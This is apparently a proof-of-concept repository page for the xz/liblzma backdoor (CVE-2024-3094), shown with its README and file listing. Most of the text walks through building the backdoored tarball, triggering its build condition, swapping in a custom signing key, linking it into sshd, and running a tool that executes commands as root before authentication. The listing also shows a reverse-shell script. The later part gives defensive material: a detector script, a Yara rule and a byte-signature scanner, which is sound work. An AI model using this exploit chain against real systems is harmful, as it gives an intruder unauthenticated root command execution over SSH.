
CVE-2024-3094 PoC — Xz: malicious code in distributed source

Source
Associated Vulnerability
Title: Xz: malicious code in distributed source (CVE-2024-3094)
Description: Malicious code was discovered in the upstream tarballs of xz, starting with version 5.6.0. Through a series of complex obfuscations, the liblzma build process extracts a prebuilt object file from a disguised test file existing in the source code, which is then used to modify specific functions in the liblzma code. This results in a modified liblzma library that can be used by any software linked against this library, intercepting and modifying the data interaction with this library.
Description
An XZ backdoor vulnerability explained in detail
Readme
# 🛡️ Cybersecurity Project: Analyzing the XZ Backdoor in liblzma

## 📄 Overview

This project analyzes the high-profile backdoor discovered in **xz-utils (liblzma)**, affecting the upstream releases **5.6.0** and **5.6.1**. The malicious code, smuggled into the release tarballs' build system rather than into the git tree, targeted SSH authentication: on distributions where `sshd` is linked (indirectly, through libsystemd) against liblzma, the modified library hooks OpenSSL's `RSA_public_decrypt` when `sshd` loads it, and a specially crafted, attacker-signed key presented during the handshake is turned into command execution as root before authentication completes.

> ⚠️ This project is for **educational and defensive research** purposes only.

# Vulnerable machine

Clone this repository

    git clone https://github.com/valeriot30/cve-2024-3094

Navigate to the directory

    cd cve-2024-3094

Build and spawn the Docker container. The Dockerfile builds a Fedora image; port 22 of the container is published on host port 2222, which the attacker tool connects to later.

    docker build -t fedora-dev .
    docker run --privileged -it --rm -p 2222:22 fedora-dev

Inside the container, fetch the backdoored release tarball. The xz-archive repository mirrors the original upstream tarballs, which is what matters here: the backdoor lives only in the generated build files shipped in the release tarballs, not in the git history.

    cd ~
    git clone https://github.com/thesamesam/xz-archive.git
    cd xz-archive/5.6/   # the backdoored release; 5.6.1 works as well
    tar xzf xz-5.6.0.tar.gz
    mv xz-5.6.0 ~

Export the build target. The injected configure logic only unpacks and links the backdoor when it believes it is producing an x86-64 RPM or Debian package (it tests `RPM_ARCH` against `x86_64` and looks for a `debian/rules` file); exporting `RPM_ARCH` as the host architecture satisfies the RPM check on an x86-64 host. On any other architecture the build completes, but the resulting library is clean.

    export RPM_ARCH=$(uname -m)

Compile the backdoored library

    cd ~/xz-5.6.0/
    ./configure
    make -j 8

Copy the backdoored shared object out of the build tree:

    cp ./src/liblzma/.libs/liblzma.so.5.6.0 ~

Clone this repository again, this time inside the container

    git clone https://github.com/valeriot30/cve-2024-3094

Patch the library with a custom key. The backdoor only accepts payloads carrying a valid Ed448 signature under a public key embedded in the library, and the matching private key was never published; `patch.py` replaces the embedded public key with one the attacker tool can sign for, which is what makes the PoC usable at all.

    python3 cve-2024-3094/patch.py liblzma.so.5.6.0

Link the backdoored library into the system in place of the installed liblzma

    sh cve-2024-3094/inject.sh

Run sshd linked with the backdoored library. The backdoor inspects its environment before activating and stays dormant when variables such as `TERM`, `LD_DEBUG` or `LD_PROFILE` are set, while expecting `LANG` to be present, hence the scrubbed environment:

    env -i LANG=C /usr/sbin/sshd -D &

# Attacker machine

Clone this repository

    git clone https://github.com/valeriot30/cve-2024-3094

Navigate to the directory

    cd cve-2024-3094

Compile the Go tool

    go build

Run the tool with the address of the vulnerable sshd (the host address and the port published by `docker run`, 2222 above) and the command to execute. The command runs inside `sshd` as root, before any authentication takes place; a long `sleep` is a convenient way to confirm execution from the target side with `ps`.

    ./bot -addr 127.0.0.2:2222 -cmd 'sleep 60'


# Counter-Measures

## Using the detector

Run the detector script, which checks whether the liblzma installed on the system is one of the affected builds

    sh detector.sh

## Using Yara

Match the Yara rule against a library file (`-s` prints the matched strings together with their offsets)

    yara rule.yar ../liblzma.so.5.6.0 -s
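As an added example of the kind of check `detector.sh` performs (this is not the repository's script), the following POSIX shell functions scan a file for the machine-code signature of the backdoor's injected function, the byte pattern published with the original disclosure of CVE-2024-3094, flag the two affected version numbers, and locate the liblzma that the installed `sshd` actually loads. The script name `detect_xz.sh` and the `--scan` flag are this example's own conventions; the sample input used to exercise it is a constructed file containing just the signature bytes.

```shell
#!/bin/sh
# Added example (not part of the valeriot30/cve-2024-3094 repository):
# detect a backdoored liblzma by byte signature, version, and sshd linkage.
# Usage: sh detect_xz.sh --scan

# First bytes of the backdoor's injected function, as published with the
# original disclosure of CVE-2024-3094 (oss-security, 2024-03-29).
XZ_BACKDOOR_SIG="f30f1efa554889f54c89ce5389fb81e7000000804883ec28488954241848894c2410"

# has_backdoor_signature FILE
#   exit 0 if FILE contains the signature bytes, 1 if not, 2 if unreadable.
#   od/tr turn the file into one continuous hex string; grep looks for the
#   pattern anywhere in it, so the check does not depend on ELF section layout.
has_backdoor_signature() {
    [ -r "$1" ] || return 2
    if od -An -v -tx1 "$1" | tr -d ' \n' | grep -q "$XZ_BACKDOOR_SIG"; then
        return 0
    fi
    return 1
}

# is_affected_version VERSION
#   exit 0 for the two backdoored upstream releases, 1 otherwise.
is_affected_version() {
    case "$1" in
        5.6.0|5.6.1) return 0 ;;
        *) return 1 ;;
    esac
}

# installed_xz_version
#   prints the version reported by the xz binary (last field of its first line).
installed_xz_version() {
    command -v xz >/dev/null 2>&1 || return 1
    xz --version 2>/dev/null | awk 'NR == 1 { print $NF }'
}

# sshd_liblzma_path
#   prints the liblzma path the installed sshd loads (via ldd), if any.
#   sshd links liblzma only indirectly (through libsystemd on affected distros),
#   so resolving the binary's dependencies, not the package list, is the check.
sshd_liblzma_path() {
    sshd="$(command -v sshd 2>/dev/null || echo /usr/sbin/sshd)"
    [ -x "$sshd" ] || return 1
    ldd "$sshd" 2>/dev/null | awk '/liblzma/ { print $3; exit }' | grep .
}

# scan_system
#   full report; exit 0 when nothing suspicious is found, 1 otherwise.
scan_system() {
    rc=0
    ver="$(installed_xz_version)" || ver="unknown"
    if is_affected_version "$ver"; then
        echo "xz $ver is an affected release"; rc=1
    else
        echo "xz version: $ver"
    fi
    if lib="$(sshd_liblzma_path)"; then
        if has_backdoor_signature "$lib"; then
            echo "backdoor signature found in $lib (loaded by sshd)"; rc=1
        else
            echo "sshd loads $lib, signature not present"
        fi
    else
        echo "sshd does not link liblzma, or sshd is not installed"
    fi
    return $rc
}

# Only run the report when explicitly asked, so the functions can also be
# sourced from other scripts without side effects.
if [ "${1:-}" = "--scan" ]; then
    scan_system
fi
```

A clean version string is not proof of safety on its own (a distribution may ship a patched 5.6.x, or a backdoored library under another name), which is why the report combines the version check with the signature scan of whatever `sshd` really loads.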
    
File Snapshot

    [4.0K] /data/pocs/b4f00e04447c7425f3520641ccebc1365b93a457
    ├── [4.0K] assets
    │   ├── [242K] liblzma.so.5.6.0
    │   └── [242K] liblzma.so.5.6.0.patch
    ├── [5.7M] bot
    ├── [4.1K] bot.go
    ├── [ 620] configure.sh
    ├── [ 433] detector.sh
    ├── [ 522] Dockerfile
    ├── [ 771] generator.py
    ├── [ 165] go.mod
    ├── [ 558] go.sum
    ├── [ 208] inject.sh
    ├── [242K] liblzma.so.5.6.0.patch
    ├── [2.1K] patch_libzma.py
    ├── [1.5K] patch.py
    ├── [2.0K] README.md
    ├── [  50] requirements.txt
    ├── [7.7K] reverse_shell.py
    └── [ 670] rule.yar

    1 directory, 18 files